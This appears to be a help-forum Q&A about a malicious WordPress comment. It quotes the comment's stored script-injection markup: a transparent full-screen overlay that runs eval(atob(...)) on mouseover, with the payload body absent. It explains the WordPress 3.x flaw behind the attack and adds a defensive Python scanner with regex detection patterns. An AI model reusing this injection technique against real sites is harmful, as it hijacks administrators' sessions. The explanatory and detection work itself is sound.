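Question

I received an email from my WordPress site, which has the comments section disabled.

This is the email:

"Author: google (IP: 210.56.50.40, 210.56.50.40)

E-mail: guest@gmail.com

URL: http://spider.google.com

Whois: http://whois.arin.net/rest/ip/210.56.50.40

Comment:

Welcome to WordPress. This is your first post.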

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('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'))" &gt; --><a></a>]

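Edit or delete it, then start blogging!"

What is this? I have already deleted the comment, but I am curious.

Best answer

The "code" is "patching" your WordPress installation (wp-comments-post.php) and sending some information to several servers (probably C&C). In addition, it deletes itself from the database.

In other words, this is a hack. The email you received is not officially from Google. It comes from a Gmail account.

The decoded source is here:

The exploit is based on the WordPress 3.x persistent script injection: http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection

Second-best answer

This is a hacking attempt that contains a special combination of characters and uses Base64 encoding to hide the malicious payload code.

The hidden code relies on an old version of WordPress being in use, for example version 3.5. In those old versions, some tricks were discovered. These tricks fool the security measures that prevent scripts from being inserted into comments. It works by using a carefully crafted combination of characters that are misinterpreted as shortcode, HTML and text, which gives access to the mouseover JavaScript event.

Tip: keep WORDPRESS on the latest version

When the mouseover is triggered by someone logged in as an administrator, any malicious code in the comment executes as if the administrator had run it.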
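An added triage example, not part of either answer or of WordPress itself: a Python check that flags comment bodies carrying the indicators visible in the quoted email (an inline event handler, `eval(atob(...))`, a transparent full-screen fixed overlay) and decodes the Base64 argument offline for review. The function name `scan_comment` and both sample comments are constructed for illustration; the sample payload is a harmless `console.log` call.

```python
import base64
import html
import re

# Indicators taken from the comment quoted in the question.
# These are triage heuristics, so a hit means "review this", not "confirmed malicious".
INDICATORS = {
    "inline_event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "eval_of_atob": re.compile(r"eval\s*\(\s*atob\s*\(", re.I),
    "fullscreen_overlay": re.compile(
        r"position\s*:\s*fixed.*?z-index\s*:\s*\d{4,}", re.I | re.S),
    "transparent_text": re.compile(r"color\s*:\s*transparent", re.I),
}
ATOB_ARG = re.compile(r"atob\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)


def scan_comment(text):
    """Return (sorted indicator names, decoded atob() arguments) for one comment."""
    # Notification mails and DB exports may entity-encode the body (&gt;, &quot;).
    text = html.unescape(text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    decoded = []
    for blob in ATOB_ARG.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # malformed Base64: keep a marker for the analyst
            decoded.append("<undecodable>")
    return hits, decoded


# Constructed samples. The first mirrors the layout of the comment in the
# question, with a harmless constructed payload in place of the real one.
_blob = base64.b64encode(b"console.log('constructed sample')").decode()
SAMPLE_SUSPICIOUS = (
    '[<a title="]" rel="nofollow"></a>[" <!-- style=\'position:fixed;top:0px;'
    'left:0px;width:6000px;height:6000px;color:transparent;'
    'z-index:999999999\' onmouseover="eval(atob(\'' + _blob + '\'))" '
    '&gt; --><a></a>]'
)
SAMPLE_BENIGN = 'Nice post, thanks! See <a href="http://example.com">this</a>.'

if __name__ == "__main__":
    for label, body in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_comment(body))
```

Run it over the comment bodies exported from the database or the moderation mailbox; the decoded text is only read, never executed.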
